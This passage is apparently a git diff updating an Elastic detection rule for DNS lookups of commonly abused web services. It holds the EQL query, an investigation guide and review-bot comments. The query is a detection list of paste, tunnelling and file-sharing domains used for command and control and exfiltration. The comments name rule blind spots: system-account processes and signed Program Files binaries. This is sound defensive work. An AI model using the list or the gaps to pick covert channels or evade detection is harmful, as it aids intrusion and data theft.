This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n 
\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n )\n ) \n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_109.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_109.json index e41814f601d..dd88354542f 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_109.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_109.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\BraveSoftware\\\\*\\\\Application\\\\brave.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\",\n 
\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera*\\\\opera.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) and process.code_signature.trusted == true\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n ) or \n\n /* Dropbox */\n (process.name : \"Dropbox.exe\" and (process.code_signature.subject_name : \"Dropbox, Inc\" and\n process.code_signature.trusted == true) and dns.question.name : (\"api.dropboxapi.com\", \"*.dropboxusercontent.com\")\n ) or \n\n /* Obsidian - Plugins are stored on raw.githubusercontent.com */\n (process.name : \"Obsidian.exe\" and (process.code_signature.subject_name : \"Dynalist Inc\" and\n process.code_signature.trusted == true) and dns.question.name : \"raw.githubusercontent.com\"\n ) or \n\n /* WebExperienceHostApp */\n (process.name : \"WebExperienceHostApp.exe\" and (process.code_signature.subject_name : \"Microsoft Windows\" and\n process.code_signature.trusted == true) and dns.question.name : (\"onedrive.live.com\", \"skyapi.onedrive.live.com\")\n )\n ) \n", "related_integrations": [ { 
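Review bot: Mutating the query and note of the already-numbered `66883649-…_109.json` artifact in this hunk, while the identical query is added below as `_110.json`, risks two package releases disagreeing on what rule version 109 detects if `_109` has already shipped in an earlier release; consider limiting the `_109` change to the `\u003e` → `>` escaping and carrying the new exclusions (Brave/Vivaldi/Opera, Dropbox, Obsidian, WebExperienceHostApp and the `process.code_signature.trusted == true` requirement on the path-based exclusions) only in `_110`. The new side of the `_109` note also still ends its account-investigation step with "to the target host after the registry modification", a leftover from a registry-based rule that does not fit this DNS query (the `_110` note below drops the sentence); if the note is to be touched at all it should read `searching for login events (for example, 4624) to the target host after the suspicious DNS activity.` The modified `not (...)` exclusion block is complete within this hunk, but the rule file's remaining fields continue in the following hunks.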
@@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_110.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_110.json new file mode 100644 index 00000000000..ad0351d65cb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_110.json 
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Commonly Abused Web Services", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network 
Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with 
legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n 
\"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\BraveSoftware\\\\*\\\\Application\\\\brave.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera*\\\\opera.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) and process.code_signature.trusted == true\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n ) or \n\n /* Dropbox */\n (process.name : \"Dropbox.exe\" and 
(process.code_signature.subject_name : \"Dropbox, Inc\" and\n process.code_signature.trusted == true) and dns.question.name : (\"api.dropboxapi.com\", \"*.dropboxusercontent.com\")\n ) or \n\n /* Obsidian - Plugins are stored on raw.githubusercontent.com */\n (process.name : \"Obsidian.exe\" and (process.code_signature.subject_name : \"Dynalist Inc\" and\n process.code_signature.trusted == true) and dns.question.name : \"raw.githubusercontent.com\"\n ) or \n\n /* WebExperienceHostApp */\n (process.name : \"WebExperienceHostApp.exe\" and (process.code_signature.subject_name : \"Microsoft Windows\" and\n process.code_signature.trusted == true) and dns.question.name : (\"onedrive.live.com\", \"skyapi.onedrive.live.com\")\n )\n ) \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "66883649-f908-4a5b-a1e0-54090a1d3a32", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1102", + "name": "Web Service", + 
"reference": "https://attack.mitre.org/techniques/T1102/" + }, + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/", + "subtechnique": [ + { + "id": "T1567.001", + "name": "Exfiltration to Code Repository", + "reference": "https://attack.mitre.org/techniques/T1567/001/" + }, + { + "id": "T1567.002", + "name": "Exfiltration to Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1567/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "66883649-f908-4a5b-a1e0-54090a1d3a32_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_1.json b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_1.json index 74306e7527d..8ee81c6129a 100644 --- a/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_1.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
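Review bot: The `threat` mapping of the new `_110.json` claims T1568.002 (Domain Generation Algorithms), but the query matches a fixed list of known web-service domains (`dns.question.name : ("raw.githubusercontent.*", "*.pastebin.*", ...)`) and contains nothing that would recognise algorithmically generated names, so that sub-technique overstates the rule's ATT&CK coverage; either drop the T1568 entry or explain the intended link in the note. The `user.id not in ("S-1-5-18", "S-1-5-19", "S-1-5-20")` clause also means an implant running as SYSTEM, LocalService or NetworkService (for example a malicious service) never fires this rule, and the investigation guide does not say so; a line under False positive analysis such as `- DNS activity from the built-in system accounts (S-1-5-18/19/20) is intentionally excluded; C2 from those contexts must be covered by service- and persistence-focused rules.` would make the blind spot explicit to analysts. Lastly, the `"?:\\Program Files\\*.exe"` and `"?:\\Program Files (x86)\\*.exe"` exclusions now require only `process.code_signature.trusted == true`, so any validly signed third-party binary installed there (including signed tunnelling or file-sharing clients) is suppressed regardless of publisher; that is a defensible noise trade-off, but it is worth stating in the note so analysts know a trusted signature alone suppresses the alert.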
